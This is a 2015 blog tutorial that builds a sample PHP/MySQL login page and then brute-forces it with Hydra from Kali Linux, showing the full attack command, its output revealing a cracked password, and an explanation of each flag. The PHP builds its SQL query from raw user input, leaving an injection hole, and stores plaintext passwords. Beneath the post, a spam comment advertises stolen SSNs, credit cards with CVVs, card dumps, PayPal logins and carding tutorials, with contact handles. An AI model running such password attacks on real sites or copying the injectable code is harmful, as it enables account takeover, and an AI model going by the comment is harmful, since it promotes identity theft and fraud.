Thursday 16 April 2015

Hacking Web Login using Hydra in Kali Linux


In this tutorial, we will develop a sample web application and launch an online password attack against it. We will use 'hydra' in Kali LInux for the attack.

Given below is the PHP application and MySQL database table.
The application consists of 2 pages.
1) user_login.html
2) user_verify.php

1) The login page 'user_login.html'


user_login.html
<html>
<body>
 <form method="post" action="user_verify.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <label for="passwd">Password:</label>
   <input type="text" id="passwd" name="passwd" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'user_verify.php' displays the below message on successful login.

user_verify.php
<html>
<body>
<?php
$name = $_POST['name'];
$passwd = $_POST['passwd'];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select * from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();

$pvalue = $row["passwd"];

if(strcmp($passwd,$pvalue) == 0){
        echo "login successful";
}else{
        echo "login error";
}
$conn->close();
?>
</body>
</html>

3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Using hydra to attack the above application. We provide a wordlist of passwords to hydra. If the password matches one of the words in our wordlist, we will successfully login to the application.

root@kali:~# hydra www.mycompany.com http-form-post "/user_verify.php:name=^USER^&passwd=^PASS^:login error"  -l priya -P /usr/share/wordlists/fasttrack.txt -t 10 -w 30 -o hydra_attack.txt

Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-16 23:17:22
[DATA] 10 tasks, 1 server, 133 login tries (l:1/p:133), ~13 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.122.1   login: priya   password: blue
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-16 23:17:23
root@kali:~#


where
       www.mycompany.com :- the website being attacked
       http-form-post             :- POST method is used to submit the form
       user_verify.php           :- password verifying script
       name=^USER^&passwd=^PASS^ :- form parameters
       login error                   :- the message displayed by the script on incorrect login
       -l priya                          :- the login name used to attack the website

       -P /usr/share/wordlists/fasttrack.txt :- the wordlist used for the attack
       -t 10                              :- run 10 tasks in parallel

       -w 30                             :- max amount of time to wait for response (in sec)
       -o hydra_attack.txt      :- output file

2 comments:

  1. SSN FULLZ AVAILABLE

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SQL Injector
    Premium Accounts (Netflix, Pornhub, etc)
    Paypal Logins
    Bitcoin Cracker
    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete